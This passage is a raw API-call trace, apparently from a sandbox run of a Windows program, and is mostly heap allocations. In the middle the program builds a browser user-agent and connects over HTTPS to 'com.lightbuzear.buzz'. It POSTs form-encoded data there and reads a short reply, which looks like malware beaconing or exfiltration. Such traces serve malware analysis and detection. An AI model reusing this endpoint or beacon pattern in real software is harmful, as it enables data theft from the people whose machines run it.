Size=0x4) returned 0x47ce610 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4780 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f46f0 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4780 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46f0 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9d70 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d70 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d70 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc18 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f50 [0170.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc18 | out: hHeap=0x4780000) returned 1 [0170.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0170.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0170.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0170.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0170.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce720 [0170.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0170.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0170.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0170.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0170.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0170.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f46f0 [0170.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0170.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0170.026] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46f0 | out: hHeap=0x4780000) returned 1 [0170.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b470 [0170.026] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0170.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9ed8 [0170.026] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b470 | out: hHeap=0x4780000) returned 1 [0170.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0170.026] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9ed8 | out: hHeap=0x4780000) returned 1 [0170.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3f) returned 0x47fa4a8 [0170.026] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0170.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb9b0 [0170.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x40) returned 0x47fa850 [0170.026] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbb38 [0170.027] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fa850 | out: hHeap=0x4780000) returned 1 [0170.027] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fa4a8 | out: hHeap=0x4780000) returned 1 [0170.027] Sleep (dwMilliseconds=0x2710) [0170.049] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0170.049] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0170.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0170.049] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0170.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0170.049] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce720 [0170.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0170.049] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0170.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0170.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f46f0 [0170.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0170.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0170.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46f0 | out: hHeap=0x4780000) returned 1 [0170.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b2b0 [0170.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0170.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f46f0 [0170.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f78 [0170.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f78 | out: hHeap=0x4780000) returned 1 [0170.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b2b0 | out: hHeap=0x4780000) returned 1 [0170.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f78 [0170.050] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0170.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0170.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0170.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0170.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0170.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0170.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce660 [0170.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0170.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0170.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0170.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4780 [0170.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0170.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0170.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4780 | out: hHeap=0x4780000) returned 1 [0170.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b430 [0170.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0170.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9e38 [0170.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b430 | out: hHeap=0x4780000) returned 1 [0170.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb9e8 [0170.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9e38 | out: hHeap=0x4780000) returned 1 [0170.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9fa0 [0170.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0170.052] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9ed8 [0170.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0170.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb9e8 | out: hHeap=0x4780000) returned 1 [0170.053] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0170.053] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0170.053] FreeLibrary (hLibModule=0x71780000) returned 1 [0170.053] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9ed8 | out: hHeap=0x4780000) returned 1 [0170.053] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9ed8 [0170.054] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0170.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0170.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce660 [0170.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0170.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4780 [0170.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47cd920 [0170.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4780 | out: hHeap=0x4780000) returned 1 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b530 [0170.054] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47cd920 | out: hHeap=0x4780000) returned 1 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47cd920 [0170.054] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f00 [0170.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f00 | out: hHeap=0x4780000) returned 1 [0170.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b530 | out: hHeap=0x4780000) returned 1 [0170.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f00 [0170.055] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0170.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9fc8 [0170.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce580 [0170.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0170.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce580 | out: hHeap=0x4780000) returned 1 [0170.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0170.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0170.055] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0170.055] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce720 [0170.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4780 [0170.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba470 [0170.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4780 | out: hHeap=0x4780000) returned 1 [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b390 [0170.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba470 | out: hHeap=0x4780000) returned 1 [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47ba470 [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d20 [0170.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d20 | out: hHeap=0x4780000) returned 1 [0170.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b390 | out: hHeap=0x4780000) returned 1 [0170.056] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce660 [0170.056] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0170.056] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0170.057] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0170.057] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0170.057] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0170.057] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0170.057] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0170.057] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b00 [0170.057] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0170.057] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0ab8 [0170.057] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b00 | out: hHeap=0x4780000) returned 1 [0170.057] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b550 [0170.057] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ab8 | out: hHeap=0x4780000) returned 1 [0170.057] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9d20 [0170.057] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b550 | out: hHeap=0x4780000) returned 1 [0170.058] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe10 [0170.058] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d20 | out: hHeap=0x4780000) returned 1 [0170.058] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d20 [0170.058] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0170.058] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d48 [0170.058] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0170.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe10 | out: hHeap=0x4780000) returned 1 [0170.068] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0170.068] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0170.068] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d48 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0908 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f08d8 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0908 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b390 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f08d8 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9d48 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b390 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbef0 [0170.069] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d48 | out: hHeap=0x4780000) returned 1 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d48 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc18 [0170.069] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d98 [0170.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc18 | out: hHeap=0x4780000) returned 1 [0170.070] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbef0 | out: hHeap=0x4780000) returned 1 [0170.070] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0170.070] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0172.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d98 | out: hHeap=0x4780000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0172.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0172.285] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0172.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0172.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0172.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0172.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0172.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0172.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0172.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0818 [0172.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0172.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0818 | out: hHeap=0x4780000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f718 [0172.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0172.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f718 | out: hHeap=0x4780000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f628 [0172.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0172.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f650 [0172.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0172.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0172.287] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0172.287] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0172.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f650 | out: hHeap=0x4780000) returned 1 [0172.287] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0172.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0172.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0172.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0172.287] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0172.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0172.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0172.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0172.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f08c0 [0172.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0172.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f08c0 | out: hHeap=0x4780000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f650 [0172.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0172.288] RtlAllocateHeap 